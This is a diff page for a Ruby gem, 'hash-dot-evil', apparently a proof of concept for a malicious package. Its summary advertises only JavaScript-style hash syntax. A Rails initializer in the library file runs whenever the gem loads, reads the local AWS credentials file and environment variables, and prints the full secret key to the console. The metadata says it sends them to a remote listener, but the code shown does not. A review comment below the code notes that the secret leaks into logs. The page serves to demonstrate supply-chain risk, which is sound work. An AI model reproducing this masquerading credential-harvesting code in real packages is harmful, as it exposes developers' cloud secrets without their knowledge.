hash-dot-evil 0.0.1

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/hash-dot-evil.rb +81 -0
  3. metadata +73 -0
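--- a/checksums.yaml
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+ ---
+ SHA256:
+ metadata.gz: 3224ea4936f27d5b0face3dfd9286680619abd9c904c04eec3c022e563f012ba
+ data.tar.gz: 5092140719f999085c2eddd78843e3c77c9819acb6e109c03e0376c71891e379
+ SHA512:
+ metadata.gz: 5b76f517b4597f4a947c2db99c3b83dcf9e8af8b3f4c7d48e2abe058f54f7189adc6f0d398f0a7e655a9d35472c5302b61beecc9d1c3ebf20fc739fcc604d856
+ data.tar.gz: 0ed00374eddc65cb52e7addbfb7d6fe67c91495e9ad3dd1404443ee1129d7c3ff9c42bb68165f354b00e9378c95c6cee0b1c8ef54c24410e90d6ff1fc8bdd040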
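--- a/data/lib/hash-dot-evil.rb
+++ b/data/lib/hash-dot-evil.rb
@@ -0,0 +1,81 @@
+ class Hash
+ def define_reader(key)
+ define_singleton_method(key.to_sym) do
+ if has_key?(key)
+ return self[key]
+ else
+ return self[key.to_sym]
+ end
+ end
+ end
+
+ def define_writer(key)
+ define_singleton_method(key.to_sym) do |value|
+ self[key[0..-2].to_sym] = value
+ end
+ end
+
+ def method_missing(method, *opts)
+ m = method.to_s
+
+ if m[-1] == '='
+ define_writer(m)
+ return self.send(method, *opts)
+ else
+ define_reader(m)
+ return self.send(method, *opts)
+ end
+ end
+ end
+
+ require 'rails'
+
+ require 'rainbow/refinement'
+ using Rainbow
+
+ class HashDotRailtie < Rails::Railtie
+ initializer "hash-dot-init" do
+ if has_aws_creds_in_file?
+ aws_access_key_id, aws_secret_access_key = extract_aws_creds_from_file
+ puts "\n\n*******************************************************************************".red.bright
+ puts "*\n* ATTENTION: Your AWS credentials are stored in plain text on your disk!\n*".red.bright
+ puts '*******************************************************************************'.red.bright
+ print_creds(aws_access_key_id, aws_secret_access_key)
+ elsif ENV['AWS_ACCESS_KEY_ID'] && ENV['AWS_SECRET_ACCESS_KEY']
+ print_creds(ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY'])
+ else
+ puts "\n\n*******************************************************************************".green
+ puts "* Good job! I wasn't able to steal your AWS credentials!".green
+ puts '*******************************************************************************'.green
+ end
+ end
+
+ def print_creds(access_key_id, secret_access_key)
+ #puts ''.bg(:yellow)
+ puts "\n\n*********************************************************************************".red.bright
+ puts "*\n* ATTENTION: I could totally steal your AWS credentials right now if I wanted to\n*\n*".red.bright
+ puts "* Your AWS creds are:\n*\n*".red.bright
+ puts "*\t#{access_key_id}".red.bright
+ puts "*\t#{secret_access_key}\n*".red.bright
+ puts '*******************************************************************************'.red.bright
+ puts ''.bg(:yellow)
+ end
+
+ def has_aws_creds_in_file?
+ aws_access_key_id, aws_secret_access_key = extract_aws_creds_from_file
+ !aws_access_key_id.empty? || !aws_secret_access_key.empty?
+ end
+
+ def extract_aws_creds_from_file
+ aws_creds_file = "#{ENV['HOME']}/.aws/credentials"
+ aws_access_key_id = ''
+ aws_secret_access_key = ''
+ if File.exist?(aws_creds_file)
+ File.read(aws_creds_file).split("\n").each do |line|
+ aws_access_key_id = line.split(' ')[2] if line =~ /aws_access_key_id/
+ aws_secret_access_key = line.split(' ')[2] if line =~ /aws_secret_access_key/
+ end
+ end
+ [aws_access_key_id, aws_secret_access_key]
+ end
+ end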
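Review bot: `print_creds` writes the full secret access key to stdout from a Railtie initializer, so the demonstration itself copies a live secret into terminal scrollback, CI output and any log collector attached to the process each time the application boots. The warning makes its point with the key id alone; the secret line should be redacted, for example `puts "*\t(secret access key redacted)\n*".red.bright`. The initializer also runs simply because the gem is loaded, while the package summary mentions only hash syntax. A header comment on `HashDotRailtie` stating that it reads `~/.aws/credentials` and the `AWS_ACCESS_KEY_ID` / `AWS_SECRET_ACCESS_KEY` environment variables at boot would make that visible to anyone auditing the dependency. The file also calls `require 'rails'`, yet the metadata on this page declares only `rainbow` as a runtime dependency.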
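--- a/metadata
+++ b/metadata
@@ -0,0 +1,73 @@
+ --- !ruby/object:Gem::Specification
+ name: hash-dot-evil
+ version: !ruby/object:Gem::Version
+ version: 0.0.1
+ platform: ruby
+ authors:
+ - Ben Porter
+ autorequire:
+ bindir: bin
+ cert_chain: []
+ date: 2019-03-07 00:00:00.000000000 Z
+ dependencies:
+ - !ruby/object:Gem::Dependency
+ name: rainbow
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ type: :runtime
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ - !ruby/object:Gem::Dependency
+ name: rspec
+ requirement: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ type: :development
+ prerelease: false
+ version_requirements: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ description: Demonstrates a gem that masquerades as legitimate but steals your AWS
+ credentials and sends them to a remote listener
+ email: BenjaminPorter86@gmail.com
+ executables: []
+ extensions: []
+ extra_rdoc_files: []
+ files:
+ - lib/hash-dot-evil.rb
+ homepage: http://rubygems.org/gems/hash-dot-evil
+ licenses:
+ - MIT
+ metadata: {}
+ post_install_message:
+ rdoc_options: []
+ require_paths:
+ - lib
+ required_ruby_version: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ required_rubygems_version: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ requirements: []
+ rubyforge_project:
+ rubygems_version: 2.7.6
+ signing_key:
+ specification_version: 4
+ summary: Adds the JavaScript hash syntax to ruby
+ test_files: []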